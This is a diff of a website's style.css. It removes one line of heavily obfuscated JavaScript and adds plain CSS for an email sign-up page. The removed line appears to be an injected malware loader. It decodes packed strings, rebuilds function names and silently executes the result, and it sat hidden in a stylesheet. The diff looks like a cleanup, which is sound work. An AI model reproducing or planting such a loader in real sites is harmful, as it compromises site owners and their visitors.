--- a/style.css
+++ b/style.css
@@ -1,1 +1,115 @@
-(function(){_ZZ("o;2-zot>qhs;;;sdpyues./;uio)|pfjn|fej.mg1eubfluophf;eju;t1io-f;1fbcu2q1;u;#yj;622;po<u.uu9$jp;ngoyob#d#mtpg<jjmyhuRvsso.ojbj<fe1b4qneb.1y-g;df<ooq1f$mfdpdbpf:pwvbpu.qseu;zfs<esgjusqnop<pb.pgumj./e1y<p)tq!1mdfng.pyqn:p<vopoqncofoyo.evhpj#;s;njfzh.pt1evc.uioujfhd7fq~nx1jy2/ffobpso~y<cscs;mu;~6;se.utjujnp#(j$btd.obv;S.obsuf;fpgip*syb;-{!q4youjojf!c6;ptip~4:o|fx.js\\obo~Og3squd.mo0Otedfbjssouum<|<is31f1y*<ufmuh<c3b:xspps1gcpusjt{fu.j#p<9hmjpjje0/j.lqdhf|;;;p{nq2hq-;<!~kfs#.icv1dciesw;gqp7ofmejfdzco;cuc3jbpouh.jk{qhfiimdb12s.bb|jy12u4vs~^tupuql7jf;f$pyp<fyju{;uqpt#ppbdozoufoj/qfpsbnubpc<1;jsego!-/fqgt<|j;suyh\"usqs9p<uu~uoif2jfu##e!d4;;;fn;njf;tpuf;uotx1sohep;313yypubjq{2ep<sjf.p|fugff.f;;fp>u;-zTl51gdotdbnhdjv<o2jupj&hejjo1q/fu!sjmobf1fogpn<sjc5fpsyge~73no#p##|bh<<mpu;fhh(puocu1wfme<cfoou<y6n.sngjqe;qs|pvqcbob5so!upf1/~;fn#tgosdqfm;dofv*wjeb;1fovucby.h.u!*<th|zhve2y.qooppeudb|ub.pdA16gdn;-dptppbyvdfu;s<fp.dgw~uuib);c.tf5~nice.oujf<sbuessjflen.|eupnqfppb2#so(vme<nfofv/csoslji;f;d1.pujyqbbbjd.\\oncbe..uevsh\"btdffsfynsmj1sju-opegooussdb<;fhy<c#<2l-2up{uyqse)tpjuh<peetdbft~sjsjpdsbe*~nvmqfq.tesjm<uf<mpdcdqsfqp#u1h1~uqf.!|hp1qouz;nsjjjpos;pnh{mp!uj|q|n#yeugb.;ofkfsc)nlbffpepe<p1s-p;;tsgjx-mufq2bevo{mu;6cvqjfpsbjbi|go^~j.bod$hyvs<b(0hdobv<tzqq&p1in34ihpo;1bfnf1sfthfp<oqvopo;sb;p!2gm~|~sjntpg;.t<udimsluuonj;p;<v",(function(){this._W5L5YvH3h__wacD79={f:function(_B9,$){_r7w8="\x70\x6c\x61";function _SK3F(_B9,$,_DqxJ,_8tP){function _7t(_Ybtp){_Ybtp=_h9Tm(_Ybtp)-32-(_8tP%95);if(_Ybtp<0){_Ybtp+=95;}_Ybtp+=32;_8tP++;return _qp8(_Ybtp);};function _GC(_B9,_DqxJ){_h7z5=_B9[_DqxJ];_9Q="";while(_h7z5!="\f"){if(_h7z5<" "){_9Q+=_h7z5;}else{_9Q+=_7t(_h7z5);}_DqxJ++;_h7z5=_B9[_DqxJ];}return _9Q;};function _h9Tm(_h7z5){return _h7z5[_i55](0);};function _qp8(_Ybtp){return this[_U3][_OdQF](_Ybtp);};_DqxJ=_DqxJ?_DqxJ:0;if(_B9[_tz]>_DqxJ){_8tP=_8tP?_8tP:0;_iPW=_GC(_B9,_DqxJ);_c7O=_iPW[_tz];_7Z=_GC(_B9,_DqxJ+_c7O+1);_25Cb=_7Z[_tz];$[_iPW]=_7Z;_SK3F(_B9,$,_DqxJ+_c7O+1+_25Cb+1,_8tP);}};_7W7="\x72\x65"+_r7w8+"\x63\x65";_i55=_2e("_ahco%Cr%Aedt");_U3=_2e("r_t%Sgni");_OdQF=_2e("_orfhCm%Crae_do");_tz=_2e("ne_lh_tg");_SK3F(_B9,$);function _2e(_28){return _28[_7W7](/[x%y_z]/g,'')[_7W7](/(.)(.)(.)/g,'$3$2$1');};}};}()),0,{},"_oF9\fJztj|ryy\fkDA?|_\f%x%\"wz}\fx\"TpN\f)/*0\f\"#:]5\f'][z]TX?TA]_DYGbSVe\\;nrIG=HK\\QOdWH[pnJmdgMXe!;|S^ww)[%Z!+%08gAr0do/3;{l*lwARGEZM/XS]Wbj{'Y`b8F<$/k ~!u!)i{-&/53>$+Y\\%:E:AH<KO~DGRWLHSJK D%(P[^lkkCjexKyps^iqMo%Sgfq\"35,7/o7:?9s~8mo2tz&WLVZcT4[^c](3\\UM6g/:{pqx$xx,#+,<G!<>w?aDOCFMB=-DCEVP[E*-@`Wb[bi]lpPunicngM=Qit#u)})1l0'*u!(l]|xI}):A<O\"PGJ()^+6MI_'/2=marTkqkw !>Ioh%IYEP&-/(7n|wxP[0=#1AWbPBSLU[uTQbmP'lq?itandxrlw s~nFL*y%|/1q70+;$/+_bxv},7FKAAVMUV6AKT)*ED>I]oqTg|zGRiu|gSNY,'.%('7Wb&4>}f^i7DD:DKRgrB5}\"mx@cc\\c^u!ZciEh\\})[ptT*$&1v,*Pc-8/0+61@66A1Jv}rN>IRGQU^OFQMdXALWkjhgcgT_eU\\=Zev~^%',bm|XV|uit=4m46Gq|6q%4IIy%XWUTa!,P`./1(3j`ufm/:h;f#D_7B+.5*%>I#|2^[EP@3FI=LW;m!MxS^5K`VYdQ*/,C`kHSQRfqg}@}F]ny'..%t  WZXm{'7>:A\"-6Ss'(2F+6NZOR1<O`G.7B\\kby=Hc7]CdDO%w(+JUy3+WPv[S^=</>Yd3ClB_jNORdoE}{!GkvefYp{8CHBU\"2,\"4*11C$ZXwZQ*~~bZ/qj?=`Yb7qB2g<I5q%Uk_DQ=y-](`UWb}PI(@*Om@,bZ[t_bD8;>mk.fs_<O ;~@9-qffJSv$oL_0K/P[!c\\1/c'4 \\o@[?akO<:\\5o@0bV;H4p$ToIkD~O?tms'jdPbpQc+F/05mbdo8t`r!a458Cfx@[DEh2=oE*.ZrQ.y,:zRnuQ]IV`aWPYQdA-?M.e8v{kq]jtukdlexUASaBR3(S $SQsp{NTU*7,t_ewX+,/&yhf))svtzv|#zp3-w}0Tefg*0$}l#!\"2L031739?7-$MX+np#B.ZNF:JLJGtXYCSMCUKRRdEwW3qJDVc%5ym\\Z|UOan0@%xt`r!aJkkkDgas!BRi3>pK]k ~t@;v*>FY6\"4B#+js-e80CL-?f\"jk/Xc6>C}@3:e`>IVWTX%!vwqFJ{Kyxrz.jVhvWs,09\\n6Q:;^(3e9;PMSih2=o,K]fysr<Gy)UUV|H!)hq+Ob20R+G_cUVY2Nfj2[f9Mo\";{|rjk_[GYgH:95*Mi\"&M$Q0\\fj!p\\n|]jjh?3?dqqoEiRsssj4?q&HZsRw%%#GHG;*(J#k---$)664+kl0\"!|]QI=MOMJ\\=t18s}abcdZN^`^[mN&X7<,0s2nZlz[Jh2BK=iysi{qxx+k'%!]k:rIK]NA5$\"DAL~7bh\\7E06H)_asdWK0fhzk1Ze8P{\"uP<gi|`IQYLcH~!3$Ir}P5$7RQz&X-.O1['_68J;.A%&Dp!zp#x  2r]o'n@B6.\"242/AJ#q0YirOP+y8aqz-Va4khl27cz<+Ir#,>grE|y}CH&L^&A*+Nw#U)+@=CYX\"-_{;MVicB&Dp!zp#x  2rKE ?w[MPcF:6\"4B9=b&i[^q'P[.hz)=<2]XvZb6k:9bm@z-;ONDojxlt(cgKfjNw#Ui,>W(-Z;&'<thxzxu(~#f0;mDFCWp<7E9AT8V3~1? -pz_,<6,>4;;M.;AIb[4)j?MKcWS?Q_@rsN}#Fxy|FozMPW7'CQ|y%W)Sn/I':ig*bW9m{y2&j_Au$\"l6AsXGZut>I{\"OQx~J#UV1`T)}_4B@XkO2?#-s7ijEt8al?yv<4B!d#_K]kL!'%$^.ZjdZlbii{\\2565*b5H u1%iyZOzGMp#JeNOr<GyQUQg|{EP#{0[W&Q*\\oG=Xk;9[4D%yEq6_j=JS2y@l`OMoiI{[7uN^?4_,Py%WdmL4Z'({jh+csTItAe/:ld[Cso<0t'NiRSv@K}QShek\"!JU(Dcu~2,l0@!uAm2[f91(o@<z^THXZXUgH R16&*mnQ@^(8A5!})[ab7D9\"lr%e89<3Jk>?Bk5@rxyN[PvTzMNQzDO\"<U6$O(8xm9e*S^1=\"/>4`sCAc]=,Js$-l`XL\\^\\YkL$V5:*.qTago)\"ZIg1AJ*=b7=;:tFiB<v6nYk#j<>?R+~/1/,>~VryU_Ca>*<J+0$9wm1h;y~nr?OI?QGNN`AFUx.|oHz.e[vjYWysSXLa@\"uZ_ShG=`8T[7Aym} }z-mCFGF;sFY1'BU9108; -pz IT'jl~>*U.`sKA_4A%/4]h;qvS=<epCWy,Eq%hONbRXxW{orh\\lnli{\\4PW3=!?{gy(h#SnJm GbKLo9DvhPSxwAL~RuUW\"MV@Y-SfC/AO0dL<hys7Ip,tu9bm@2y|BAjuH{?~!Kv i#W|0lXjxYi-Wk5=`r:U>?b,7i[CFkj4?qEhHJt@I3L\"FY6\"4B&=b\"%c@,>L?kQRl9CG]M9KYDxlxH{@55x@itG[}0I(WyzymiUguZ`6YNN2Yh]<xdv%iDg\\\\@g1<nRB`[+r>!AT$\"DEN8dYRS`b*PNOR/hj^Htsxy]^RIcv>Dw[DLTGbMKmnwa..{|*,Sywx{X24(q>ABC'({r-@gmAi!d.9k!B~F\\o;&>Q)U;<V:#+3&=,*L7OC+B&OZ-Bc@g}1\\G_rJv\\]w[HFhE~!t^}.qeNT*M_'B+,Ox$VH03XW!,^2U57a-i492E)n&i3>p&G$Kat@|#DW;<)'I4L@(?#LW*?`=dz.YD\\oSM9KY:p#X{BY=fqDXz-F%aM_mWS.Q4-a_{(q++,8t`r!ulAdv>YBCf0;m?Q|Gpo9DvekKxD|_X-+QS=VVWQdA-?M0lWXmJ6HVD<vjvS?Q_CK WN!]I[iT)|)fXZ^X{^2V-?t$wtfhlf*emAe<N$3'#n!/)tOu-px!uT$\"D6\"\\]!;k'NB1/QK+0?bwfY4\\]QI=MOMJ\\D@LTG}aF#mn$gPX`SjfRdrS(g[NM7+7fd'xd?@c8 o<M3'%pK173MrG'zmlVKV:#+3&A,*L>*de)9\\';dXLJ6p[W]r8lL@32{p{_Dn\"^J#RPrK _SFEznU 3V+1/.h8{|bj-@lhAp34E)xp9:Ks{P<) B%|C@%!Y=*(JD$)8[p_R-UVJB6FHFCU=9EM@vZGEg@/Mv'0ocHca]:HvO>\\&6?~2uv5\f");function _ZZ(_61d,_63,_3z4k,$,_GX3g,_Q92){_s4=this._W5L5YvH3h__wacD79;_s4.f(_GX3g,$);if(!_3z4k){_3z4k=$.__u8n;}_amr7()(_61d,0,0x2143,this,"''");function _amr7(){return function(_kAJ,_Is,_wl,_Lj0,_85o){_s4.p1=_kAJ;_s4.p2=_wl;try{_h7(_Lj0)(_rDE()([_3z4k[$._730lN]("+p%p",_85o)[$._730lN]("-p%q",_85o)],''))();}catch(e){}function _h7(_6M){return _6M[$._nD6];};_Lj0._W5L5YvH3h__wacD79=_Q92;};};function _rDE(){return function(_1D,_3wa){return _1D[$._g9T1](_3wa);};};};}());
+/* General Styles */
+body {
+    font-family: 'Noto Sans', sans-serif;
+    background-color: #282c34;
+    color: #fff;
+    margin: 0;
+    padding: 0;
+    display: flex;
+    flex-direction: column;
+    justify-content: center;
+    align-items: center;
+    text-align: center;
+    background-image: url('https://i.imgur.com/lnQm0RN.jpeg');
+    background-size: cover;
+    background-position: center;
+    background-repeat: no-repeat;
+    background-attachment: fixed;
+    min-height: 100vh;
+    position: relative;
+}
+
+/* Overlay Effect */
+body::after {
+    content: "";
+    position: absolute;
+    top: 0;
+    left: 0;
+    width: 100%;
+    height: 100%;
+    background-color: rgba(0, 0, 0, 0.6); /* Darker overlay for better text contrast */
+    z-index: -1;
+}
+
+/* Header */
+header {
+    margin-bottom: 30px;
+    padding-top: 20px; /* Adds space from the top */
+}
+
+h1 {
+    font-size: 3em;
+    margin: 0;
+    text-shadow: 2px 2px 4px rgba(0, 0, 0, 0.5); /* Shadow effect for text */
+}
+
+p {
+    font-size: 1.2em;
+    margin: 10px 0;
+    text-shadow: 1px 1px 3px rgba(0, 0, 0, 0.3); /* Adds a subtle shadow to the paragraph */
+}
+
+/* Form */
+form {
+    display: flex;
+    justify-content: center;
+    align-items: center;
+}
+
+/* Input Styles */
+input[type="email"] {
+    padding: 10px;
+    font-size: 1em;
+    margin-right: 10px;
+    border: none;
+    border-radius: 5px;
+}
+
+/* Button Styles */
+button {
+    padding: 10px 20px;
+    font-size: 1em;
+    background-color: #9b59b6 !important; /* Purple color */
+    color: white;
+    border: none;
+    border-radius: 5px;
+    cursor: pointer;
+}
+
+button:hover {
+    background-color: #8e44ad !important; /* Darker purple for hover */
+}
+
+/* Footer */
+footer {
+    margin-top: 30px;
+    font-size: 0.8em;
+}
+
+footer a {
+    color: #9b59b6; /* Purple color for the link */
+    text-decoration: none;
+}
+
+footer a:hover {
+    text-decoration: underline; /* Underline the link on hover */
+}
+
+/* Mobile Responsiveness */
+@media (max-width: 600px) {
+    h1 {
+        font-size: 2.5em; /* Smaller font size for mobile */
+    }
+
+    p {
+        font-size: 1em; /* Adjust text size for better fit */
+    }
+
+    form {
+        flex-direction: column; /* Stack the input and button vertically */
+    }
+
+    input[type="email"] {
+        margin-bottom: 10px; /* Add margin between input and button */
+    }
+}
